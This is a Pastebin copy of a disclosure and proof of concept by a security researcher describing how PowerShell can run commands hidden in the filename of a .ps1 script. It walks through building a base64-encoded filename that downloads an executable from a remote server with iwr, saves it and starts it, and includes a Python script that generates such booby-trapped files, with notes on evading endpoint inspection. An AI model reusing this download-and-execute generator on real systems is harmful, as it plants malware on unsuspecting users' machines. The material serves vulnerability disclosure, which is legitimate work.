API tools faq
paste
Advertisement
lollhosh

PowerShell Unsanitized Filename Command Execution by Jp

lollhosh
Aug 2nd, 2019
112
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.00 KB | None | 0 0
raw download clone embed print report
  1. [+] Credits: John Page (aka hyp3rlinx)
  2. [+] Website: hyp3rlinx.altervista.org
  3.  
  4. PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames.
  5. This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file;
  6. or the running of unexpected commands straight from the filename itself without the need for a second file.
  7.  
  8. For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf.
  9. Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard
  10. Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.
  11.  
  12. However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working.
  13.  
  14. Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger
  15. the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts
  16. as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell.
  17.  
  18. My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant.
  19. Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest)
  20. abbreviated for space then it sleeps for 2 seconds and finally executes.
  21.  
  22. C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
  23.  
  24. This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed.
  25. We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are
  26. commands can be stored.
  27.  
  28. For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files.
  29.  
  30. First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe".
  31. c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
  32.  
  33. Give the PS script a normal begining name, then separate commands using ";" semicolon e.g.
  34.  
  35. Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1
  36.  
  37. Create the executable without a file extension to save space for the filename then save it back using the -O parameter.
  38. The "-e" is abbreviated for EncodedCommand to again save filename space.
  39.  
  40. Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever.
  41. Double click to open in PowerShell watch the file get downloaded saved and executed!
  42.  
  43. My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.
  44.  
  45. Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string!
  46.  
  47.  
  48. [Exploit / PoC]
  49. from base64 import b64encode
  50. import argparse,sys
  51. #Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
  52. #Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
  53. #Expects hostname/ip-addr of web-server housing the exploit.
  54. #By hyp3rlinx
  55. #Apparition Security
  56. #====================
  57.  
  58.  
  59. def parse_args():
  60. parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
  61. parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
  62. parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
  63. return parser.parse_args()
  64.  
  65. def main(args):
  66. PSEmbedFilenameMalwr=""
  67. if args.ipaddress:
  68. PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
  69. return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))
  70.  
  71. def create_file(payload):
  72. f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
  73. f.write("Write-Output 'Have a nice day!'")
  74. f.close()
  75.  
  76. if __name__=="__main__":
  77.  
  78. parser = argparse.ArgumentParser()
  79. PSCmds = main(parse_args())
  80.  
  81. if len(sys.argv)==1:
  82. parser.print_help(sys.stderr)
  83. sys.exit(1)
  84.  
  85. create_file(PSCmds)
  86. print "PowerShell - Unsantized Filename Command Execution File created!"
  87. print "By hyp3rlinx"
  88.  
  89. [POC Video URL]
  90. https://www.youtube.com/watch?v=AH33RW9g8J4
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!